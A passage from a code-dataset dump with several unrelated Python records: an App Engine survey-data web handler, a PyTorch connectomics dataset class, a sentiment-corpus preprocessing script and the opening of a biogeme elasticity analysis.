db_key).get()\n\t\t\t\te = {}\n\t\t\t\ttry:\n\t\t\t\t\te['photo'] = 'http://' + base_url + \"/get_image_thumb?key=\" + str(s.photo_ref.key());\n\t\t\t\texcept (AttributeError):\n\t\t\t\t\te['photo'] = ''\n\t\t\t\te['latitude'] = s.latitude\n\t\t\t\te['longitude'] = s.longitude\n\t\t\t\te['stressval'] = s.stressval\n\t\t\t\te['category'] = s.category\n\t\t\t\te['subcategory'] = s.subcategory\n\t\t\t\te['comments'] = s.comments\n\t\t\t\te['key'] = str(s.key())\n\t\t\t\te['version'] = s.version\n\t\t\t\tif s.hasphoto:\n\t\t\t\t\te['photo_key'] = str(s.photo_ref.key())\n\t\t\t\telse:\n\t\t\t\t\te['photo_key'] = None\n\t\t\t\tself.response.out.write(json.dumps(e))\n\t\t\t\treturn\n\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.out.write(\"No data has been uploaded :[\")\n\t\t\t\treturn\n\t\tself.response.out.write(\"No data has been uploaded :[\")\n\t# end get method\n# End GetAPoint Class\n\n# handler for: /get_an_image\nclass GetAnImage(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\t# returns image as jpeg\n\tdef get(self):\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = db.GqlQuery(\"SELECT * FROM SurveyPhoto WHERE __key__ = :1\", db_key).get()\n\t\t\t\tif s:\n\t\t\t\t\tself.response.headers['Content-type'] = 'image/jpeg'\n\t\t\t\t\tself.response.headers['Last-Modified'] = s.timestamp.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tx = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n\t\t\t\t\tself.response.headers['Expires'] = x.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tself.response.headers['Cache-Control'] = 'public, max-age=315360000'\n\t\t\t\t\tself.response.headers['Date'] = datetime.datetime.utcnow() \n\t\t\t\t\n\t\t\t\t\tself.response.out.write(s.photo)\n\t\t\t\telse:\n\t\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\telse:\n\t\t\tself.response.set_status(401, 'No Image requested.')\n\t# end get method\n# End GetAnImage Class\n\n# handler for: /get_a_thumb\nclass GetAThumb(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\t# returns image as jpeg\n\tdef get(self):\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = 
db.GqlQuery(\"SELECT * FROM SurveyPhoto WHERE __key__ = :1\", db_key).get()\n\t\t\t\tif s:\n\t\t\t\t\tself.response.headers['Content-type'] = 'image/jpeg'\n\t\t\t\t\tself.response.headers['Last-Modified'] = s.timestamp.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tx = datetime.datetime.now() + datetime.timedelta(days=30)\n\t\t\t\t\tself.response.headers['Expires'] = x.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n\t\t\t\t\tself.response.headers['Cache-Control'] = 'public, max-age=315360000'\n\t\t\t\t\tself.response.headers['Date'] = datetime.datetime.utcnow() \n\t\t\t\t\tself.response.out.write(s.thumb)\n\t\t\t\telse:\n\t\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\t\texcept (db.Error):\n\t\t\t\tself.response.set_status(401, 'Image not found.')\n\t\telse:\n\t\t\tself.response.set_status(401, 'No Image requested.')\n\t# end get method\n# End GetAnImage Class\n\n# handler for: /get_image_thumb\nclass GetImageThumb(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyPhoto \n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\t\tself.response.headers['Content-type'] = 'text/html'\n\t\treq_key = self.request.get('key')\n\t\tself.response.out.write(\"\")\n\t# end get method\n# end GetImageThumb Class\n\n# list data page: /data\nclass DataByDatePage(webapp.RequestHandler):\n\t# display data in table format\n\t# TODO: page results\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = 'http://' + os.environ['HTTP_HOST'] + '/'\n\t\telse:\n\t\t\tbase_url = 'http://' + os.environ['SERVER_NAME'] + '/'\n\n\t\t# get bookmark\n\t\tbookmark = self.request.get('bookmark')\n\n\t\tlogging.debug(self.request.get('bookmark'))\n\n\t\ttemplate_values = { 'base_url' : base_url }\n\n\t\tforward = True\n\n\t\tpage = None\n\n\t\t# check if page set\n\t\tif self.request.get('page'):\n\t\t\tpage = int(self.request.get('page'))\n\t\telif not bookmark:\n\t\t\tpage = 1\n\n\t\t# fetch cached values if any\n\t\tsaved = None\n\t\textracted = None\n\n\t\t# if page set, and page in range, get page for cache\n\t\tif page > 0 and page <=5: \n\t\t\tsaved = memcache.get('saved')\n\n\t\t\t# if not in cache, try fetching from datastore\n\t\t\tif not saved:\n\t\t\t\tlogging.debug('cache miss, populate')\n\t\t\t\t# get 5 pages of most recent records and cache\n\t\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE*5 + 1)\n\t\t\t\tsaved = helper.extract_surveys (surveys)\n\t\t\t\t# if values returned, save in cache\n\t\t\t\tif surveys is not None:\n\t\t\t\t\tmemcache.set('saved', saved)\n\n\t\t\t# if data, setup display\n\t\t\tif saved:\n\t\t\t\t# get page\n\t\t\t\textracted = helper.get_page_from_cache(saved, page, PAGE_SIZE)\n\n\t\t\t\tlogging.debug(len(extracted))\n\n\t\t\t\t# if got page\n\t\t\t\tif extracted is not None:\n\t\t\t\t\tif len(extracted) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['next'] = str(extracted[-1]['realtime'])\n\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t\textracted = extracted[:PAGE_SIZE-1]\n\n\t\t\t\t\t# if not on first page, setup back \n\t\t\t\t\tif page > 1:\n\t\t\t\t\t\ttemplate_values['back'] = str(extracted[0]['realtime'])\n\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\n\n\t\telse: # pages beyond 5th not cached\n\t\t\tlogging.debug('not using cache')\n\t\t\t# determine direction to retrieve records\n\t\t\t# if starts with '-', going backwards\n\t\t\tif bookmark.startswith('-'):\n\t\t\t\tforward = False\n\t\t\t\tbookmark = bookmark[1:]\n\t\t\t\n\t\t\t# if bookmark set, retrieve page relative to bookmark\n\t\t\tif bookmark:\n\t\t\t\t# string to datetime code from:\n\t\t\t\t#\thttp://aralbalkan.com/1512\n\t\t\t\tm = re.match(r'(.*?)(?:\\.(\\d+))?(([-+]\\d{1,2}):(\\d{2}))?$',\n\t\t\t\t\tstr(bookmark))\n\t\t\t\tdatestr, fractional, tzname, tzhour, tzmin = m.groups()\n\t\t\t\tif tzname is None:\n\t\t\t\t\ttz = None\n\t\t\t\telse:\n\t\t\t\t\ttzhour, tzmin = int(tzhour), int(tzmin)\n\t\t\t\t\tif tzhour == tzmin == 0:\n\t\t\t\t\t\ttzname = 'UTC'\n\t\t\t\t\ttz = FixedOffset(timedelta(hours=tzhour,\n\t\t\t\t\t\t\t\t\t\t\t minutes=tzmin), tzname)\n\t\t\t\tx = datetime.datetime.strptime(datestr, \"%Y-%m-%d %H:%M:%S\")\n\t\t\t\tif fractional is None:\n\t\t\t\t\tfractional = '0'\n\t\t\t\t\tfracpower = 6 - len(fractional)\n\t\t\t\t\tfractional = float(fractional) * (10 ** fracpower)\n\t\t\t\tdt = x.replace(microsecond=int(fractional), tzinfo=tz)\n\n\n\t\t\t\tif forward:\n\t\t\t\t\tsurveys = SurveyData.all().filter('timestamp <', dt).order('-timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\t\t# if PAGE_SIZE + 1 rows returned, more pages to display\n\t\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['next'] = str(surveys[-2].timestamp)\n\t\t\t\t\t\tif page is not None:\n\t\t\t\t\t\t\tlogging.debug(page)\n\t\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\n\t\t\t\t\t# if bookmark set, assume there was a back page\n\t\t\t\t\ttemplate_values['back'] = '-'+str(surveys[0].timestamp)\n\t\t\t\t\tif page is not None:\n\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\t\t\t\telse:\n\t\t\t\t\tsurveys = SurveyData.all().filter('timestamp >', dt).order('timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\t\t# if PAGE_SIZE + 1 rows returned, more pages to display\n\t\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\t\ttemplate_values['back'] = '-'+str(surveys[-2].timestamp)\n\t\t\t\t\t\tif page is not None:\n\t\t\t\t\t\t\ttemplate_values['backpage'] = page - 1\n\t\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\t\t\t\t\t# if bookmark set, assume there is a next page\n\t\t\t\t\ttemplate_values['next'] = str(surveys[0].timestamp)\n\t\t\t\t\tif page is not None:\n\t\t\t\t\t\ttemplate_values['nextpage'] = page + 1\n\t\t\t\t\t# reverse order of results since they were returned backwards by query\n\t\t\t\t\tsurveys.reverse()\n\t\t\telse: # if no bookmark set, retrieve first records\n\t\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE+1)\n\t\t\t\tif len(surveys) == PAGE_SIZE + 1:\n\t\t\t\t\ttemplate_values['next'] = str(surveys[-2].timestamp)\n\t\t\t\t\ttemplate_values['nextpage'] = 2\n\t\t\t\t\tsurveys = surveys[:PAGE_SIZE]\n\n\t\t\textracted = helper.extract_surveys (surveys)\n\n\t\ttemplate_values['surveys'] = extracted \n\t\ttemplate_values['data'] = True\n\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/data.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end get method\n# End DataPage Class\n\n# handler for: /data_download_all.csv\nclass DownloadAllData(webapp.RequestHandler):\n\t# returns csv of all data\n\tdef get(self):\n\t\t# check cache for csv dump\n\t\t# I'm not sure at what point this will become infeasible (too large for the cache)\n\t\tdata = memcache.get('csv')\n\t\t\n\n\t\t# if all data in cache, output and done\n\t\tif data is not None:\n\t\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\t\tself.response.out.write(data)\n\t\t\treturn\n\n
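\t\t# [Editor's note: illustrative aside, not part of the original record. The read\n\t\t# path in this handler is a read-through cache: try memcache first, fall back to\n\t\t# the datastore, and repopulate the cache on a miss. A minimal generic sketch of\n\t\t# the pattern, where fetch_from_store is a hypothetical callable:]\n\t\tdef cached_get(cache, key, fetch_from_store):\n\t\t\tcached = cache.get(key)\n\t\t\tif cached is None:\n\t\t\t\tcached = fetch_from_store()\n\t\t\t\tif cached is not None:\n\t\t\t\t\tcache.set(key, cached)\n\t\t\treturn cached\n\n\t\t# if cache miss, check if csv blob 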
exist\n\t\tdata_csv = SurveyCSV.all().filter('page =', 1).get()\n\n\t\t# if csv blob exist, set in cache and output\n\t\tif data_csv is not None:\n\t\t\t# add to cache for 1 week\n\t\t\t#memcache.set('csv', data_csv.csv, 604800)\n\t\t\tmemcache.set('csv', data_csv.csv)\n\n\t\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\t\tself.response.out.write(data_csv.csv)\n\t\t\treturn\n\n\t\t'''\n\t\t# you should never get here except for the first time this url is called\n\t\t# if you need to populate the blob, make sure to call this url\n\t\t#\tbefore any requests to write new data or the blob will start from that entry instead\n\t\t# NOTE: this will probably only work as long as the number of entries in your survey is low\n\t\t#\tIf there are too many entries already, this will likely time out\n\t\t#\tI have added page as a property of the model incase we need it in future\n\t\tsurveys = SurveyData.all().order('timestamp').fetch(1000)\n\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\t\tcounter = 0\n\t\tlast_entry_date = ''\n\t\tpage = 1\n\n\t\t# setup csv\n\t\toutput = cStringIO.StringIO()\n\t\twriter = csv.writer(output, delimiter=',')\n\n\t\theader_row = [\t'id',\n\t\t\t\t\t\t'userid', \n\t\t\t\t\t\t'timestamp',\n\t\t\t\t\t\t'latitude',\n\t\t\t\t\t\t'longitude',\n\t\t\t\t\t\t'stress_value',\n\t\t\t\t\t\t'category',\n\t\t\t\t\t\t'subcategory',\n\t\t\t\t\t\t'comments',\n\t\t\t\t\t\t'image_url'\n\t\t\t\t\t\t]\n\n\t\twriter.writerow(header_row)\n\t\tfor s in surveys:\n\t\t\tphoto_url = ''\n\t\t\tif s.hasphoto:\n\t\t\t\ttry:\n\t\t\t\t\tphoto_url = 'http://' + base_url + \"/get_an_image?key=\"+str(s.photo_ref.key())\n\t\t\t\texcept:\n\t\t\t\t\tphoto_url = 'no_image'\n\n\t\t\telse:\n\t\t\t\tphoto_url = 'no_image'\n\n\t\t\thashedval = hashlib.sha1(str(s.key()))\n\t\t\tsha1val = hashedval.hexdigest()\n\n\t\t\tusersha1val = ''\n\t\t\tif s.username is not None:\n\t\t\t\tuserhashedval = hashlib.sha1(s.username)\n\t\t\t\tusersha1val = userhashedval.hexdigest()\n\t\t\telse:\n\t\t\t\tusersha1val = 'none'\n\n\t\t\tnew_row = [\n\t\t\t\t\tsha1val,\n\t\t\t\t\tusersha1val,\n\t\t\t\t\ts.timestamp,\n\t\t\t\t\ts.latitude,\n\t\t\t\t\ts.longitude,\n\t\t\t\t\ts.stressval,\n\t\t\t\t\ts.category,\n\t\t\t\t\ts.subcategory,\n\t\t\t\t\ts.comments,\n\t\t\t\t\tphoto_url\n\t\t\t\t\t]\n\t\t\twriter.writerow(new_row)\n\t\t\tcounter += 1\n\t\t\tlast_entry_date = s.timestamp\n\n\t\t# write blob csv so we dont have to do this again\n\t\tinsert_csv = SurveyCSV()\n\t\tinsert_csv.csv = db.Text(output.getvalue())\n\t\tinsert_csv.last_entry_date = last_entry_date\n\t\tinsert_csv.count = counter\n\t\tinsert_csv.page = page\n\t\tinsert_csv.put()\n\n\t\t# add to cache for 1 week (writes should update this cached value)\n\t\t#memcache.set('csv', output.getvalue(), 604800)\n\t\tmemcache.set('csv', output.getvalue())\n\n\t\tself.response.headers['Content-type'] = 'text/csv'\n\t\tself.response.out.write(output.getvalue())\n\t\t'''\n\t# end get method\n# End DownloadAllData\n\n# handler for: /summary\n# displays count of each category\nclass SummaryHandler(webapp.RequestHandler):\n\tdef get(self):\n\t\tself.handle()\n\t# end get method\n\n\tdef post(self):\n\t\tself.handle()\n\t# end post method\n\n\tdef handle(self):\n\t\tresult = SubCategoryStat().all()\n\n\t\tcategories = {}\n\n\t\tfor row in result:\n\t\t\tif not categories.has_key(row.category):\n\t\t\t\tcategories[row.category] = 
{\n\t\t\t\t\t\t'category':row.category,\n\t\t\t\t\t\t'count':row.count,\n\t\t\t\t\t\t'total':row.total\n\t\t\t\t\t\t}\n\t\t\t\tif row.count != 0:\n\t\t\t\t\tcategories[row.category]['average'] = row.total/row.count\n\t\t\t\telse:\n\t\t\t\t\tcategories[row.category]['average'] = 0\n\n\t\t\t\tcategories[row.category]['subcategories'] = {}\n\t\t\telse:\n\t\t\t\tcategories[row.category]['count'] += row.count\n\t\t\t\tcategories[row.category]['total'] += row.total\n\t\t\t\tif categories[row.category]['total'] != 0:\n\t\t\t\t\tcategories[row.category]['average'] = \\\n\t\t\t\t\t\tcategories[row.category]['total'] / categories[row.category]['count']\n\n\t\t\tif not categories[row.category]['subcategories'].has_key(row.subcategory):\n\t\t\t\tsubavg = 0\n\t\t\t\tif row.count != 0:\n\t\t\t\t\tsubavg = row.total / row.count\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory] = { \n\t\t\t\t\t\t'subcategory':row.subcategory, \n\t\t\t\t\t\t'count':row.count,\n\t\t\t\t\t\t'total':row.total,\n\t\t\t\t\t\t'average':subavg \n\t\t\t\t\t\t}\n\t\t\telse:\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['count'] += row.count\n\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['total'] += row.total\n\t\t\t\tif categories[row.category]['subcategories'][row.subcategory]['total'] != 0:\n\t\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['average'] = \\\n\t\t\t\t\t\tcategories[row.category]['subcategories'][row.subcategory]['total'] / categories[row.category]['subcategories'][row.subcategory]['count']\n\n\t\tdata = []\n\t\tfor key,cat in categories.items():\n\t\t\tcat['subcatlist'] = []\n\n\t\t\tfor skey,scat in cat['subcategories'].items():\n\t\t\t\tcat['subcatlist'].append(scat)\n\n\t\t\tdel cat['subcategories']\n\t\t\tdel cat['total']\n\t\t\tdata.append(cat)\n\t\t\t#newrow = {}\n\n\t\t\t#newrow['category'] = cat['category']\n\t\t\t#newrow['count'] = cat['count']\n\t\t\t#newrow['average'] = cat['average']\n\n\n\t\ttemplate_values = { 'summary' : data }\n\t\ttemplate_values['datasummary'] = True\n\t\ttemplate_values['divstyle'] = ['span-11 colborder','span-12 last']\n\n\t\tlogging.debug(template_values)\n\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/summary.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end handle method\n# End SummaryHandler Class\n","sub_path":"appengine/displaydata.py","file_name":"displaydata.py","file_ext":"py","file_size_in_byte":17079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"18175015","text":"from __future__ import print_function, division\nimport numpy as np\n\nimport torch\nimport torch.utils.data\n\nfrom .misc import crop_volume, rebalance_binary_class\n\nfrom scipy.ndimage import label as scipy_label\nimport scipy.ndimage.morphology as morphology\n\nclass MaskDataset(torch.utils.data.Dataset):\n    \"\"\"PyTorch dataset class for affinity graph prediction.\n\n    Args:\n        volume: input image stacks.\n        label: segmentation stacks.\n        sample_input_size (tuple, int): model input size.\n        sample_label_size (tuple, int): model output size.\n        sample_stride (tuple, int): stride size for sampling.\n        augmentor: data augmentor.\n        mode (str): training or inference mode.\n    \"\"\"\n    def __init__(self,\n                 volume, label=None,\n                 sample_input_size=(8, 64, 64),\n                 sample_label_size=None,\n                 sample_stride=(1, 1, 1),\n                 augmentor=None,\n                 mode='train',\n                 seed_points=None,\n                 pad_size=None,\n                 multisegment_gt=True):\n        if mode == 'test':\n
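            # [Editor's note: illustrative aside, not part of the original record.\n            # sample_num_c below is a cumulative sum over per-dataset seed counts, so a flat\n            # sample index maps back to its source dataset via the last bound it clears:\n            #   cum = np.cumsum([0] + [3, 5, 2])  # -> array([ 0,  3,  8, 10])\n            #   np.argmax(6 < cum) - 1            # -> 1, i.e. the second dataset]\n            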
for x in seed_points:\n assert len(x) == 1\n\n self.mode = mode\n self.input = volume\n self.label = label\n self.augmentor = augmentor # data augmentation\n\n # samples, channels, depths, rows, cols\n self.input_size = [np.array(x.shape) for x in self.input] # volume size, could be multi-volume input\n self.sample_input_size = np.array(sample_input_size) # model input size\n self.sample_label_size = np.array(sample_label_size) # model label size\n\n self.seed_points = seed_points\n self.half_input_sz = (sample_input_size//2)\n self.seed_points_offset = pad_size - self.half_input_sz\n self.sample_num = np.array([(np.sum([y.shape[0] for y in x])) for x in self.seed_points])\n self.sample_num_a = np.sum(self.sample_num)\n self.sample_num_c = np.cumsum([0] + list(self.sample_num))\n\n # specifies if there are multiple segments in the GT, if yes then we need to keep only the central segment while calling get_item\n self.multisegment_gt = multisegment_gt\n\n def __len__(self): # number of seed points\n return self.sample_num_a\n\n def __getitem__(self, index):\n vol_size = self.sample_input_size\n valid_mask = None\n\n # Train Mode Specific Operations:\n if self.mode == 'train':\n # 2. get input volume\n seed = np.random.RandomState(index)\n # if elastic deformation: need different receptive field\n # change vol_size first\n pos = self.get_pos_seed(seed)\n out_label = crop_volume(self.label[pos[0]], vol_size, pos[1:])\n out_input = crop_volume(self.input[pos[0]], vol_size, pos[1:])\n\n # select the center segment and delete the rest\n # this is needed only for parallel fibers, for the single neuron prediction only perform cc and remove\n # the non central segments\n if self.multisegment_gt:\n out_label = self.keep_seg(out_label, out_label[tuple(self.half_input_sz)])\n\n # Remove non central segment\n out_label = self.remove_non_central_seg(out_label)\n\n # 3. 
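\n            # [Editor's note: illustrative aside, not part of the original record.\n            # Because the RandomState above is seeded with the sample index, a given index\n            # always reproduces the same position and augmentation draw, e.g.\n            #   np.random.RandomState(7).randint(100) == np.random.RandomState(7).randint(100)  # True\n            # ]\n            # 3. 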
augmentation\n if self.augmentor is not None: # augmentation\n data = {'image':out_input, 'label':out_label.astype(np.float32)}\n augmented = self.augmentor(data, random_state=seed)\n out_input, out_label = augmented['image'], augmented['label']\n out_input = out_input.astype(np.float32)\n out_label = out_label.astype(np.float32)\n\n # Test Mode Specific Operations:\n elif self.mode == 'test':\n # test mode\n pos = self.get_pos_test(index)\n out_input = crop_volume(self.input[pos[0]], vol_size, pos[1:])\n out_label = None if self.label is None else crop_volume(self.label[pos[0]], vol_size, pos[1:])\n\n if out_label is not None:\n out_label = torch.from_numpy(out_label) # did not create a copy because remove non central seg creates a copy\n out_label = out_label.unsqueeze(0)\n\n # Turn input to Pytorch Tensor, unsqueeze once to include the channel dimension:\n out_input = torch.from_numpy(out_input.copy())\n out_input = out_input.unsqueeze(0)\n\n if self.mode == 'train':\n\t\t\t# TODO if masked loss around center is needed use this mask for rebalancing\n # mask = morphology.binary_dilation(out_label[0].numpy(), structure=np.ones((5, 5, 5)))\n # mask = mask.astype(np.float32)\n\n # Rebalancing\n temp = 1.0 - out_label.clone()\n weight_factor, weight = rebalance_binary_class(temp, mask=None) # torch.from_numpy(mask)\n return pos, out_input, out_label, weight, weight_factor\n\n else:\n return pos, out_input\n\n def get_pos_dataset(self, index):\n return np.argmax(index < self.sample_num_c) - 1 # which dataset\n\n def get_pos_seed(self, seed, offset=None):\n pos = [0, 0, 0, 0]\n # pick a dataset\n did = self.get_pos_dataset(seed.randint(self.sample_num_a))\n pos[0] = did\n # pick a mask bin\n # p = [0.45, 0.15, 0.10, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05]\n size_bin = np.random.choice(len(self.seed_points[did]))\n # pick a index\n idx = np.random.randint(self.seed_points[did][size_bin].shape[0])\n # pick a position\n if offset is None:\n pos[1:] = self.seed_points[did][size_bin][idx] + self.seed_points_offset\n else:\n pos[1:] = self.seed_points[did][size_bin][idx] + offset\n return pos\n\n def get_pos_test(self, index):\n did = self.get_pos_dataset(index)\n idx = index - self.sample_num_c[did]\n pos = self.seed_points[did][0][idx]\n pos = pos + self.seed_points_offset\n return np.concatenate(([did], pos))\n\n def get_vol(self, pos):\n out_input = crop_volume(self.input[pos[0]], self.sample_input_size, pos[1:])\n out_input = torch.from_numpy(out_input.copy())\n out_input = out_input.unsqueeze(0)\n return out_input\n\n def keep_seg(self, label, seg_id_to_keep):\n return label == seg_id_to_keep\n\n def remove_non_central_seg(self, label):\n out_label, _ = scipy_label(label)\n\n if out_label[tuple(self.half_input_sz)] == 0:\n print('Center pixel is not inside 2nd inference\\'s GT segmentation.')\n print('This probably happened due to augmentation')\n # Find nearby segment id and use that for now\n seg_ids = np.unique(out_label[self.half_input_sz[0]-5:self.half_input_sz[0]+6,\n self.half_input_sz[1]-5:self.half_input_sz[1]+6,\n self.half_input_sz[2]-5:self.half_input_sz[2]+6])\n seg_ids = seg_ids[seg_ids > 0]\n if seg_ids.shape[0] > 1:\n print('More than 1 disconnected segments near the center. 
This should have never happened!')\n print('Using the first segment')\n c_seg_id = seg_ids[0]\n out_label = (out_label == c_seg_id)\n else:\n out_label = (out_label == out_label[tuple(self.half_input_sz)])\n\n return out_label\n","sub_path":"torch_connectomics/data/dataset/dataset_mask.py","file_name":"dataset_mask.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556006839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 21 13:45:57 2017\n\n@author: masoud\n\"\"\"\nfrom nltk.corpus import stopwords\nimport random\n\n\n\npathp= '/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/test'\n#pathn = '/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/negative.review'\ndata = open(pathp, 'r').read().split('\\n')\ndata = [line for line in data if line.rstrip()]\n#datan = open(pathp, 'r').read().split('\\n')\ndic_name = 'vocab_mds_book'\ndictionary = []\npre_data = []\nrandom.shuffle(data)\n\n\"building ditionary and preprocess the data\"\nfor line in data: \n temp = []\n line = line.split()\n lable = line[-1]\n lable = lable.split(':')[1] \n line.remove(line[-1])\n if lable == 'positive':\n temp.append('1')\n elif lable == 'negative':\n temp.append('2')\n for word in line:\n wrd = word.split(':')[0]\n if wrd not in stopwords.words('english'):\n temp.append(word)\n if wrd not in dictionary:\n dictionary.append(wrd)\n tmp = ' '.join(str(i) for i in temp )\n pre_data.append(tmp)\ndel word, wrd, temp,tmp, line, pathp, data, lable\n\n\n\"save dictionary\"\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/'+ dic_name, 'w')\nrandom.shuffle(dictionary)\nflag = 1\nfor word in dictionary:\n if flag == 1: \n flag = 2\n file.write(\"%s\" %word)\n else:\n file.write('\\n')\n file.write(\"%s\" %word)\ndel flag, word,dic_name\nfile.close()\n\n\n\"save preprocessed data\"\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/pre_data', 'w')\nflag = 1\nfor line in pre_data:\n if flag == 1:\n flag = 2\n file.write(\"%s\" %line)\n elif flag == 2:\n file.write(\"\\n%s\"%line)\nfile.close()\n \n \n\"create and save libsvm file\"\nlib = []\nfor line in pre_data:\n temp = []\n line = line.split()\n temp.append(line[0])\n line.remove(line[0])\n for item in line:\n id = dictionary.index(item.split(':')[0])+1\n cnt= item.split(':')[1] \n value = str(id)+':'+ str(cnt)\n temp.append(value)\n temp = ' '.join(str(i) for i in temp) \n lib.append(temp)\nfile = open('/media/masoud/fd4e5863-3840-41b0-9b36-8260426e494d/MSc/Thesis/Datasets/multidomain sentiment/books/lib', 'w')\nflag = 1\nfor line in lib:\n if flag == 1:\n flag = 2\n file.write(\"%s\" %line)\n elif flag == 2:\n file.write(\"\\n%s\" %line)\nfile.close()\ndel flag, id, item, cnt, line, temp, value\n","sub_path":"mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76727242","text":"\"\"\"File 05nestedElasticitiesConfidenceIntervals.py\n\n:author: Michel Bierlaire, EPFL\n:date: Wed Sep 11 15:57:46 2019\n\n We use a previously estimated nested logit model.\n Three alternatives: public transporation, car and slow modes.\n RP data.\n We calculate disaggregate and aggregate direct arc elasticities, and\n the confidence 
intervals.\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport biogeme.database as db\nimport biogeme.biogeme as bio\nfrom biogeme import models\nimport biogeme.results as res\nfrom biogeme.expressions import Beta\n\n# Calculate confidence intervals for elasticities requires interval arithmetics\n# Use 'pip install pyinterval' if not available on your system.\n# Warning: other types of interval packages are also available.\ntry:\n import interval as ia\nexcept ModuleNotFoundError:\n print('Use \"pip install pyinterval\" to install a requested package')\n sys.exit()\n\n# Read the data\ndf = pd.read_csv('optima.dat', sep='\\t')\ndatabase = db.Database('optima', df)\n\n# The following statement allows you to use the names of the variable\n# as Python variable.\nglobals().update(database.variables)\n\n# Exclude observations such that the chosen alternative is -1\ndatabase.remove(Choice == -1.0)\n\n# Normalize the weights\nsumWeight = database.data['Weight'].sum()\nnumberOfRows = database.data.shape[0]\nnormalizedWeight = Weight * numberOfRows / sumWeight\n\n# Calculate the number of accurences of a value in the database\nnumberOfMales = database.count('Gender', 1)\nprint(f'Number of males: {numberOfMales}')\n\nnumberOfFemales = database.count('Gender', 2)\nprint(f'Number of females: {numberOfFemales}')\n\n# For more complex conditions, using directly Pandas\nunreportedGender = database.data[\n (database.data['Gender'] != 1) & (database.data['Gender'] != 2)\n].count()['Gender']\nprint(f'Unreported gender: {unreportedGender}')\n\n\n# List of parameters. Their value will be set later.\nASC_CAR = Beta('ASC_CAR', 0, None, None, 0)\nASC_PT = Beta('ASC_PT', 0, None, None, 1)\nASC_SM = Beta('ASC_SM', 0, None, None, 0)\nBETA_TIME_FULLTIME = Beta('BETA_TIME_FULLTIME', 0, None, None, 0)\nBETA_TIME_OTHER = Beta('BETA_TIME_OTHER', 0, None, None, 0)\nBETA_DIST_MALE = Beta('BETA_DIST_MALE', 0, None, None, 0)\nBETA_DIST_FEMALE = Beta('BETA_DIST_FEMALE', 0, None, None, 0)\nBETA_DIST_UNREPORTED = Beta('BETA_DIST_UNREPORTED', 0, None, None, 0)\nBETA_COST = Beta('BETA_COST', 0, None, None, 0)\n\n# Define new variables. 
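\n# [Editor's note: illustrative aside, not part of the original record. The direct\n# arc elasticity computed further down follows\n#     E = (P_after - P_before) * x / (P_before * delta_x);\n# a tiny numeric check with hypothetical values:]\np_before, p_after = 0.20, 0.18  # choice probabilities before/after the change\nx_val, delta_x = 3.0, 1.0       # attribute level (km) and its increment\nassert abs((p_after - p_before) * x_val / (p_before * delta_x) - (-0.3)) < 1e-12\n\n# Define new variables. 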
